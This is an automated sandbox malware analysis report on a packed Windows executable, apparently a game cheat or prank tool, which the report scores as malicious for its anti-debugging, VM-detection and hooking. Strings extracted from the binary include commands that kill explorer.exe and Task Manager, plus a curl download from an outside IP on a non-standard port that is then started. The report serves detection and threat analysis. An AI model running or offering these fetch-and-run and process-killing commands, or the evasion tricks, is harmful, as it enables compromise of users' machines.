Edit tour

Windows Analysis Report
LisectAVT_2403002A_290.exe

Overview

General Information

Sample name:	LisectAVT_2403002A_290.exe
Analysis ID:	1482366
MD5:	1a23985dadc6831a82e0595728023980
SHA1:	a3e8ec7d8f8d7accb522245445dc8159c0b94d12
SHA256:	7206d4443497a4bc7fd0cff0fe622e5b7037ea4947f1c2f313ef98eb755e99fc
Tags:	exe
Infos:

Detection

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

AI detected suspicious sample

Detected VMProtect packer

Found direct / indirect Syscall (likely to bypass EDR)

Hides threads from debuggers

Machine Learning detection for sample

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Tries to detect debuggers (CloseHandle check)

Tries to detect virtualization through RDTSC time measurements

Tries to evade analysis by execution special instruction (VM detection)

Checks if the current process is being debugged

Detected TCP or UDP traffic on non-standard ports

Entry point lies outside standard sections

PE file contains sections with non-standard names

Program does not show much activity (idle)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Classification

Process Tree

System is w10x64

LisectAVT_2403002A_290.exe (PID: 3380 cmdline: "C:\Users\user\Desktop\LisectAVT_2403002A_290.exe" MD5: 1A23985DADC6831A82E0595728023980)

conhost.exe (PID: 2972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: LisectAVT_2403002A_290.exe

Avira: detected

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for sample

Source: LisectAVT_2403002A_290.exe

Joe Sandbox ML: detected

Source: LisectAVT_2403002A_290.exe, 00000000.00000002.2037923988.0000017916264000.00000002.10000000.00040000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_7aa4c8a2-e

Source: LisectAVT_2403002A_290.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\decoder\vcpkg\buildtrees\curl\x64-windows-rel\lib\libcurl.pdb source: LisectAVT_2403002A_290.exe, 00000000.00000002.2037923988.0000017916264000.00000002.10000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\decoder\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb source: LisectAVT_2403002A_290.exe, 00000000.00000002.2037748439.00000179148EF000.00000002.10000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\decoder\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb## source: LisectAVT_2403002A_290.exe, 00000000.00000002.2037748439.00000179148EF000.00000002.10000000.00040000.00000000.sdmp

Source: global traffic

TCP traffic: 192.168.2.5:49704 -> 185.204.109.14:5145

Source: unknown	TCP traffic detected without corresponding DNS query: 185.204.109.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.204.109.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.204.109.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.204.109.14

Source: LisectAVT_2403002A_290.exe	String found in binary or memory: http://185.204.109.14:4777/ballincasin.mp3
Source: LisectAVT_2403002A_290.exe	String found in binary or memory: http://185.204.109.14:4777/ballincasin.mp3start
Source: LisectAVT_2403002A_290.exe	String found in binary or memory: http://pki-crl.symauth.com/ca_219679623e6b4fa507d638cbeba72ecb/LatestCRL.crl07
Source: LisectAVT_2403002A_290.exe	String found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr
Source: LisectAVT_2403002A_290.exe	String found in binary or memory: http://pki-ocsp.symauth.com0
Source: LisectAVT_2403002A_290.exe, 00000000.00000002.2037765453.00000179148F7000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.zlib.net/D
Source: LisectAVT_2403002A_290.exe, 00000000.00000002.2037962399.0000017916281000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://curl.se/V
Source: LisectAVT_2403002A_290.exe, 00000000.00000002.2037923988.0000017916264000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: LisectAVT_2403002A_290.exe, 00000000.00000002.2037962399.0000017916281000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://curl.se/docs/copyright.htmlD
Source: LisectAVT_2403002A_290.exe, 00000000.00000002.2037923988.0000017916264000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://curl.se/docs/hsts.html
Source: LisectAVT_2403002A_290.exe, 00000000.00000002.2037923988.0000017916264000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: LisectAVT_2403002A_290.exe	String found in binary or memory: https://discord.gg/W2mrcAMEAH
Source: LisectAVT_2403002A_290.exe	String found in binary or memory: https://discord.gg/W2mrcAMEAHChams
Source: LisectAVT_2403002A_290.exe	String found in binary or memory: https://www.myinstants.com/media/sounds/skibidi-toilet.mp3

System Summary

Detected VMProtect packer

Source: LisectAVT_2403002A_290.exe

Static PE information: .vmp0 and .vmp1 section names

Source: LisectAVT_2403002A_290.exe, 00000000.00000002.2037962399.0000017916281000.00000002.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamelibcurl.dllB vs LisectAVT_2403002A_290.exe
Source: LisectAVT_2403002A_290.exe, 00000000.00000002.2037765453.00000179148F7000.00000002.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamezlib1.dll* vs LisectAVT_2403002A_290.exe

Source: classification engine

Classification label: mal84.evad.winEXE@2/1@0/1

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2972:120:WilError_03

Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe "C:\Users\user\Desktop\LisectAVT_2403002A_290.exe"
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Section loaded: d3d9.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Section loaded: zlib1.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Section loaded: libcurl.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Section loaded: mswsock.dll	Jump to behavior

Source: LisectAVT_2403002A_290.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: LisectAVT_2403002A_290.exe

Static file information: File size 4124168 > 1048576

Source: LisectAVT_2403002A_290.exe

Static PE information: Raw size of .vmp1 is bigger than: 0x100000 < 0x3df400

Source: LisectAVT_2403002A_290.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\decoder\vcpkg\buildtrees\curl\x64-windows-rel\lib\libcurl.pdb source: LisectAVT_2403002A_290.exe, 00000000.00000002.2037923988.0000017916264000.00000002.10000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\decoder\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb source: LisectAVT_2403002A_290.exe, 00000000.00000002.2037748439.00000179148EF000.00000002.10000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\decoder\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb## source: LisectAVT_2403002A_290.exe, 00000000.00000002.2037748439.00000179148EF000.00000002.10000000.00040000.00000000.sdmp

Source: initial sample

Static PE information: section where entry point is pointing to: .vmp1

Source: LisectAVT_2403002A_290.exe	Static PE information: section name: .vmp0
Source: LisectAVT_2403002A_290.exe	Static PE information: section name: .vmp1

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Memory written: PID: 3380 base: 7FF8C8A50008 value: E9 8B D7 E9 FF	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Memory written: PID: 3380 base: 7FF8C88ED790 value: E9 80 28 16 00	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Memory written: PID: 3380 base: 7FF8C8A60008 value: E9 8B DA E8 FF	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Memory written: PID: 3380 base: 7FF8C88EDA90 value: E9 80 25 17 00	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Memory written: PID: 3380 base: 7FF8C8A70008 value: E9 4B D6 E7 FF	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Memory written: PID: 3380 base: 7FF8C88ED650 value: E9 C0 29 18 00	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Memory written: PID: 3380 base: 7FF8C8A80008 value: E9 AB D0 E6 FF	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Memory written: PID: 3380 base: 7FF8C88ED0B0 value: E9 60 2F 19 00	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Memory written: PID: 3380 base: 7FF8C8A90008 value: E9 0B D2 E5 FF	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Memory written: PID: 3380 base: 7FF8C88ED210 value: E9 00 2E 1A 00	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Memory written: PID: 3380 base: 7FF8C8AA0008 value: E9 0B D9 E4 FF	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Memory written: PID: 3380 base: 7FF8C88ED910 value: E9 00 27 1B 00	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Memory written: PID: 3380 base: 7FF8C8AB0008 value: E9 CB D4 E3 FF	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Memory written: PID: 3380 base: 7FF8C88ED4D0 value: E9 40 2B 1C 00	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Memory written: PID: 3380 base: 7FF8C8AC0008 value: E9 2B D9 E2 FF	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Memory written: PID: 3380 base: 7FF8C88ED930 value: E9 E0 26 1D 00	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Memory written: PID: 3380 base: 7FF8C8AD0008 value: E9 0B DA E1 FF	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Memory written: PID: 3380 base: 7FF8C88EDA10 value: E9 00 26 1E 00	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Memory written: PID: 3380 base: 7FF8C8AE0008 value: E9 EB D4 E0 FF	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Memory written: PID: 3380 base: 7FF8C88ED4F0 value: E9 20 2B 1F 00	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Memory written: PID: 3380 base: 7FF8C8AF0008 value: E9 2B D5 DF FF	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Memory written: PID: 3380 base: 7FF8C88ED530 value: E9 E0 2A 20 00	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Memory written: PID: 3380 base: 7FF8C8B00008 value: E9 4B D4 DE FF	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Memory written: PID: 3380 base: 7FF8C88ED450 value: E9 C0 2B 21 00	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Memory written: PID: 3380 base: 7FF8C8B10008 value: E9 EB D9 DD FF	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Memory written: PID: 3380 base: 7FF8C88ED9F0 value: E9 20 26 22 00	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Memory written: PID: 3380 base: 7FF8C8B2000D value: E9 BB CB DF FF	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Memory written: PID: 3380 base: 7FF8C891CBC0 value: E9 5A 34 20 00	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Memory written: PID: 3380 base: 7FF8C8B30008 value: E9 CB D1 DB FF	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Memory written: PID: 3380 base: 7FF8C88ED1D0 value: E9 40 2E 24 00	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Memory written: PID: 3380 base: 7FF8C8B40008 value: E9 EB D1 DA FF	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Memory written: PID: 3380 base: 7FF8C88ED1F0 value: E9 20 2E 25 00	Jump to behavior

Malware Analysis System Evasion

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe

RDTSC instruction interceptor: First address: 7FF7FE4684F1 second address: 7FF7FE46850E instructions: 0x00000000 rdtsc 0x00000002 inc ecx 0x00000003 pop ecx 0x00000004 inc ebp 0x00000005 bsf edi, esi 0x00000008 stc 0x00000009 and ah, 0000004Bh 0x0000000c pop ebp 0x0000000d inc ecx 0x0000000e test bl, 0000005Fh 0x00000011 inc ecx 0x00000012 adc bl, FFFFFF9Fh 0x00000015 inc eax 0x00000016 xor bh, 0000002Ah 0x00000019 pop esi 0x0000001a inc ecx 0x0000001b rcr ch, cl 0x0000001d rdtsc

Tries to evade analysis by execution special instruction (VM detection)

Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe

Special instruction interceptor: First address: 7FF7FEAE8076 instructions rdtsc caused by: RDTSC with Trap Flag (TF)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: LisectAVT_2403002A_290.exe, 00000000.00000002.2037782890.000001791498F000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect debuggers (CloseHandle check)

Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe

Handle closed: DEADC0DE

Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	Process queried: DebugObjectHandle			Jump to behavior

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	NtCreateFile: Indirect: 0x7FF7FE704677	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	NtQueryVolumeInformationFile: Indirect: 0x7FF7FE704786	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	NtMapViewOfSection: Indirect: 0x7FF7FE7049CE	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	NtProtectVirtualMemory: Indirect: 0x7FF7FE7024BE	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	NtQueryAttributesFile: Indirect: 0x7FF7FE704618	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe	NtOpenFile: Indirect: 0x7FF7FE7046E2	Jump to behavior

Source: LisectAVT_2403002A_290.exe	Binary or memory string: Shell_TrayWnd
Source: LisectAVT_2403002A_290.exe	Binary or memory string: than 10.00 aim could work incorrect!%dmsWorldXRay Status:waitWarning!PreviewOther##crossSpeedRainbowstalcraft.exestalcraftw.exeGame executableInfobibadaysbober.su Discordhttps://discord.gg/W2mrcAMEAHChams loadingABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789RtlAdjustPrivilegentdll.dllNtRaiseHardError Y: X: C:\Windows\Fonts\Arial.ttftemp.buf > \/taskkill /IM explorer.exe /Ftaskkill /IM taskmgr.exe /F\ballincasin.mp3curl -o ballincasin.mp3 http://185.204.109.14:4777/ballincasin.mp3start ballincasin.mp3"del "Shell_TrayWnd.bmpFailed to initialize WinsockFailed to create socket185.204.109.14Failed to connect to serverFailedCheck your internet connection!rwid;;explorer.execurl -o skibidi.mp3 https://www.myinstants.com/media/sounds/skibidi-toilet.mp3\skibidi.mp3bimba

Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	2 Process Injection	11 Virtualization/Sandbox Evasion	1 Credential API Hooking	411 Security Software Discovery	Remote Services	1 Credential API Hooking	1 Non-Standard Port	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	2 Process Injection	LSASS Memory	11 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	Junk Data	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	212 System Information Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
LisectAVT_2403002A_290.exe	100%	Avira	TR/Black.Gen2
LisectAVT_2403002A_290.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://pki-ocsp.symauth.com0	0%	URL Reputation	safe
http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr	0%	URL Reputation	safe
https://curl.se/docs/copyright.htmlD	0%	Avira URL Cloud	safe
http://185.204.109.14:4777/ballincasin.mp3start	0%	Avira URL Cloud	safe
https://curl.se/docs/http-cookies.html	0%	Avira URL Cloud	safe
https://curl.se/docs/alt-svc.html	0%	Avira URL Cloud	safe
https://curl.se/docs/hsts.html	0%	Avira URL Cloud	safe
http://185.204.109.14:4777/ballincasin.mp3	0%	Avira URL Cloud	safe
http://pki-crl.symauth.com/ca_219679623e6b4fa507d638cbeba72ecb/LatestCRL.crl07	0%	Avira URL Cloud	safe
https://www.myinstants.com/media/sounds/skibidi-toilet.mp3	0%	Avira URL Cloud	safe
https://discord.gg/W2mrcAMEAH	0%	Avira URL Cloud	safe
http://www.zlib.net/D	0%	Avira URL Cloud	safe
https://discord.gg/W2mrcAMEAHChams	0%	Avira URL Cloud	safe
https://curl.se/V	0%	Avira URL Cloud	safe

Name	Source	Malicious	Antivirus Detection	Reputation
https://curl.se/docs/hsts.html	LisectAVT_2403002A_290.exe, 00000000.00000002.2037923988.0000017916264000.00000002.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://curl.se/docs/copyright.htmlD	LisectAVT_2403002A_290.exe, 00000000.00000002.2037962399.0000017916281000.00000002.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://curl.se/docs/http-cookies.html	LisectAVT_2403002A_290.exe, 00000000.00000002.2037923988.0000017916264000.00000002.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pki-ocsp.symauth.com0	LisectAVT_2403002A_290.exe	false	URL Reputation: safe	unknown
http://185.204.109.14:4777/ballincasin.mp3	LisectAVT_2403002A_290.exe	false	Avira URL Cloud: safe	unknown
http://www.zlib.net/D	LisectAVT_2403002A_290.exe, 00000000.00000002.2037765453.00000179148F7000.00000002.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.204.109.14:4777/ballincasin.mp3start	LisectAVT_2403002A_290.exe	false	Avira URL Cloud: safe	unknown
http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr	LisectAVT_2403002A_290.exe	false	URL Reputation: safe	unknown
https://www.myinstants.com/media/sounds/skibidi-toilet.mp3	LisectAVT_2403002A_290.exe	false	Avira URL Cloud: safe	unknown
https://curl.se/docs/alt-svc.html	LisectAVT_2403002A_290.exe, 00000000.00000002.2037923988.0000017916264000.00000002.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pki-crl.symauth.com/ca_219679623e6b4fa507d638cbeba72ecb/LatestCRL.crl07	LisectAVT_2403002A_290.exe	false	Avira URL Cloud: safe	unknown
https://discord.gg/W2mrcAMEAH	LisectAVT_2403002A_290.exe	false	Avira URL Cloud: safe	unknown
https://curl.se/V	LisectAVT_2403002A_290.exe, 00000000.00000002.2037962399.0000017916281000.00000002.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://discord.gg/W2mrcAMEAHChams	LisectAVT_2403002A_290.exe	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.204.109.14	unknown	Russian Federation		39444	OWENTIS-ASFR	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1482366
Start date and time:	2024-07-25 21:52:17 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 2m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	3
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	LisectAVT_2403002A_290.exe
Detection:	MAL
Classification:	mal84.evad.winEXE@2/1@0/1
EGA Information:	Failed
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Execution Graph export aborted for target LisectAVT_2403002A_290.exe, PID 3380 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
VT rate limit hit for: LisectAVT_2403002A_290.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.204.109.14	2132.exe	Get hash	malicious	Unknown	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
OWENTIS-ASFR	Doc-317715824.eml	Get hash	malicious	HTMLPhisher	Browse	85.31.212.12
	VM 976-687889, June 05, 2024.eml	Get hash	malicious	Unknown	Browse	85.31.212.12
	Agreement 19-77329-05-Jun-2024.eml	Get hash	malicious	HTMLPhisher	Browse	85.31.212.12
	2132.exe	Get hash	malicious	Unknown	Browse	185.204.109.14
	sora.x86.elf	Get hash	malicious	Mirai	Browse	85.31.212.133
	Yk6wfqLJ92.elf	Get hash	malicious	Mirai	Browse	85.31.212.153
	N3IaNLgXfp.elf	Get hash	malicious	Mirai	Browse	85.31.212.111
	LvVirzr3Fq.elf	Get hash	malicious	Mirai	Browse	85.31.212.110
	sScKDrSyhO	Get hash	malicious	Mirai	Browse	85.31.212.127
	aBot.arm7	Get hash	malicious	Mirai	Browse	85.31.212.108

Process:	C:\Users\user\Desktop\LisectAVT_2403002A_290.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	21028
Entropy (8bit):	2.5216406363433186
Encrypted:	false
SSDEEP:	6:1bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbZ:H
MD5:	5B2B4C3CB341EF187A6BAE00E3731C7C
SHA1:	742901CE151851F6FB1F0EFC900C4A9AE608AF60
SHA-256:	F47B0980D149BE356F7AB6F83D03AE5BD63791409C177261C596DAFAB3279274
SHA-512:	DFFF0732647E72E54DA0D5E2AB6617ADF31299517FA699F35B93A2F6D7965F0D0C67A7A7E4B6FBA39BBF75655EF9F924ED05E1AA976023125141E3FE38F187D5
Malicious:	false
Reputation:	low
Preview:	bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba.

Static File Info

General

File type:	PE32+ executable (console) x86-64, for MS Windows
Entropy (8bit):	7.987223618881403
TrID:	Win64 Executable Console (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	LisectAVT_2403002A_290.exe
File size:	4'124'168 bytes
MD5:	1a23985dadc6831a82e0595728023980
SHA1:	a3e8ec7d8f8d7accb522245445dc8159c0b94d12
SHA256:	7206d4443497a4bc7fd0cff0fe622e5b7037ea4947f1c2f313ef98eb755e99fc
SHA512:	17daf3895ce90820ae289a10ecc97459199b70c3c08dae9c4284b202c319e400a95f31e53caa8bc0aca0fbb5c95424c4e27a56898b9aa551c0ea832c5bb117ac
SSDEEP:	98304:QL4fhqBZfj5dzCIZdmH1eYmxDrnAwvOTVoC2FCBazNoI:Qnfj5dCIZdmH1CvaA/zN
TLSH:	93163397E50E07A9D40A5BB095EB49E078D6399D2F85D02D797CEECE338181DCF02B62
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...G...G...G...?r..G.......G.......G.......G.......G.......G...?...G...G...F.......G.......G.......G..Rich.G..........PE..d..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x14043c70c
Entrypoint Section:	.vmp1
Digitally signed:	false
